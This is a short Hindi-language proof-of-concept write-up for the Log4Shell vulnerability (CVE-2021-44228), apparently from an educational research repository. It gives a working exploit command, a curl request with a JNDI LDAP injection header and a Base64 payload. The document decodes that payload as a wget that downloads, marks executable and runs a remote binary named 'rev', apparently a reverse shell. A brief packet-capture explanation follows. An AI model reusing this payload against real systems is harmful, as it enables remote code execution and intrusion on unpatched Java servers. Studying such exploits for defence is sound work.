
Log4Shell (CVE-2021-44228) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जिसमें LDAP सर्वर सेटअप, पेलोड जनरेशन, और शैक्षिक भेद्यता अनुसंधान के लिए पैकेट कैप्चर विश्लेषण शामिल है।
Log4Shell — जिसे CVE-2021-44228 के नाम से भी जाना जाता है — एक गंभीर कमजोरी है जो Apache Foundation के Log4j का उपयोग करने वाले सिस्टमों में रिमोट कोड निष्पादन को सक्षम बनाती है। Log4j एक ओपन-सोर्स जावा लाइब्रेरी है जो वाणिज्यिक और ओपन-सोर्स सॉफ्टवेयर उत्पादों और उपयोगिताओं में व्यापक रूप से उपयोग की जाती है।

POC विश्लेषण
कमजोर सर्वर पोर्ट 8080 पर चल रहा है

और ldap सर्वर दो पोर्ट http 8888 और ldap 1389 पर चल रहा है

एक्सप्लॉइट कमांड
curl 172.17.0.2:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==}'
{
172.17.0.2:8080 -- कमजोर सर्वर का IP
172.17.0.1:1389 -- LDAP सर्वर का IP
Base64 -- d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==
डिक्रिप्टेड कमांड - wget https://10.0.2.15:8000/rev -O /tmp/rev && chmod +x /tmp/rev && /tmp/rev
}
पैकेट विश्लेषण


जैसा कि हम पैकेट्स में देख सकते हैं कि सर्वर LDAP सर्वर को एक क्लास के लिए GET अनुरोध भेज रहा है। यदि हम एक्सप्लॉइट क्लास की जाँच करें तो हम देख सकते हैं कि LDAP सर्वर एक्सप्लॉइट क्लास में डिक्रिप्टेड कमांड भेज रहा है।

संदर्भ